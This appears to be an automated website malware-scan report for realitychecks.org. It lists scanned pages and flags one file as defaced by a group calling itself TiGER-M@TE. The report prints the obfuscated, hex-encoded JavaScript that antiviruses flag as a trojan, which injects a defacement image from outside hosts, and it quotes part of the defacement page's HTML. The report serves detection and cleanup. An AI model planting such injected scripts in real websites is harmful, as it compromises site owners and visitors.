New scan:

Malware Scanner report for realitychecks.org

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

HackeD By TiGER-M@TE  (111 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://realitychecks.org/
200 OK
Content-Length: 897
Content-Type: text/html
clean
http://realitychecks.org/Adminsoft.org/
200 OK
Content-Length: 272
Content-Type: text/html
clean
http://realitychecks.org/Adminsoft.org/cgi-bin/
200 OK
Content-Length: 260
Content-Type: text/html
clean
http://realitychecks.org/test404page.js
404 Not Found
Content-Length: 236
Content-Type: text/html
clean
http://realitychecks.org/Adminsoft/
200 OK
Content-Length: 412
Content-Type: text/html
clean
http://realitychecks.org/AdminsoftDownloadUSA/
200 OK
Content-Length: 244
Content-Type: text/html
clean
http://realitychecks.org/AdminsoftPHP/
200 OK
Content-Length: 317
Content-Type: text/html
clean
http://realitychecks.org/AdminsoftTest/
200 OK
Content-Length: 490
Content-Type: text/html
clean
http://realitychecks.org/DownloadBeta.Admin-soft.com/
200 OK
Content-Length: 324
Content-Type: text/html
clean
http://realitychecks.org/DownloadBeta.Admin-soft.com/index.php.1317172668
200 OK
Content-Length: 12497
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);

Antivirus reports:

TrendMicro-HouseCall
TROJ_GEN.F47V0217
Sophos
Troj/HckHTML-C

Deface/Content modification. The following signature was found: HackeD By TiGER-M@TE

<html><head>
<title>HackeD By TiGER-M@TE</title></head>
<style>
body { scrollbar-track-color: #000000;scrollbar-darkshadow-color: #000000; scrollbar-face-color: #000000; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #000000; scrollbar-arrow-color: #FFFFFF; color:#8E959E }
.name { text-decoration: none;}
</style><script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x
...[12717 bytes skipped]...


http://realitychecks.org/GECL/
200 OK
Content-Length: 3781
Content-Type: text/html
clean
http://realitychecks.org/GECL/index.htm
200 OK
Content-Length: 3781
Content-Type: text/html
clean
http://realitychecks.org/PerspectiveArt/
200 OK
Content-Length: 4226
Content-Type: text/html
clean
http://realitychecks.org/PerspectiveArt/Scripts/PhotoGalleryLR.js
200 OK
Content-Length: 898
Content-Type: application/javascript
clean
http://realitychecks.org/PerspectiveArt/Scripts/PhotoGalleryEngine.js
200 OK
Content-Length: 923
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: realitychecks.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 15 Dec 2015 21:40:33 GMT
Server: Apache
Content-Length: 897
Content-Type: text/html;charset=ISO-8859-1

...897 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: realitychecks.org
Referer: http://www.google.com/search?q=realitychecks.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=realitychecks.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://realitychecks.org/

Result: realitychecks.org is not infected or malware details are not published yet.